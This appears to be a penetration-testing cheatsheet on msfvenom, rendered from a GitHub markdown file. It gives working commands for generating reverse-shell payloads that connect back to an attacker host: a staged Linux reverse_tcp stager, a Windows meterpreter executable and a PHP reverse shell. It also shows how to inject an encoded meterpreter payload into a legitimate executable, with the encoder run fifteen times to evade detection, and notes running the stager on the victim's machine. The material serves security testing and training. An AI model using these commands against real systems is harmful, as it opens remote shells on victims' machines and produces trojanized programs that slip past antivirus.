Skip to content

Latest commit

 

History

History
67 lines (54 loc) · 2.75 KB

msfvenom.md

File metadata and controls

67 lines (54 loc) · 2.75 KB
Raw

msfvenom

cheatsheet

Create a Reverse Shell in Linux with a Staged Payload

To search for payloads:

└─$ msfvenom  --list payloads | grep x64 | grep linux | grep reverse
    linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/pingback_reverse_tcp                      Connect back to attacker and report UUID (Linux x64)
    linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x64/shell_reverse_ipv6_tcp                    Connect back to attacker and spawn a command shell over IPv6
    linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

Pick the staged shell payload linux/x64/shell/reverse_tcp:

$ msfvenom -p linux/x64/shell/reverse_tcp lhost=127.0.0.1 lport=5353 -f elf -o reverse5353

Pass this payload to the target machine.

Next, make the payload executable:

$ chmod +x reverse5353
$ ./reverse5353

On Kali, set up a listener with the same payload.

Finally, run the stager on victim's machine.

$ ./reverse5353

It should starts downloading the rest of the payload from Kali, which starts a reverse shell on Kali.

(optional) upgrade to a meterpreter with /post/multi/manage/shell_to_meterpreter module

Create a payload for Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -a x86 -f exe > output.exe

Create a reverse shell payload in PHP

$ msfvenom -p php/meterpreter_reverse_tcp lhost=<my-ip> lport=<port> -o shell.php

set up a listener with the same payload using exploit/multi/handler

Inject Payload into an Executable

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=5353 -f exe -e x86/shikata_ga_nai -i 15 -k -x service_bak.exe > service.exe
  • -x: Specify what executable file (to use as a template) to inject the payload into
  • -k: Preserve the template behavior and inject the payload as a new thread
  • -e x86/shikata_ga_nai -i 15: Encoding the payload 15 times using shikata_ga_nai

a similar example

more example

To check encoding options:

msfvenom -l encoders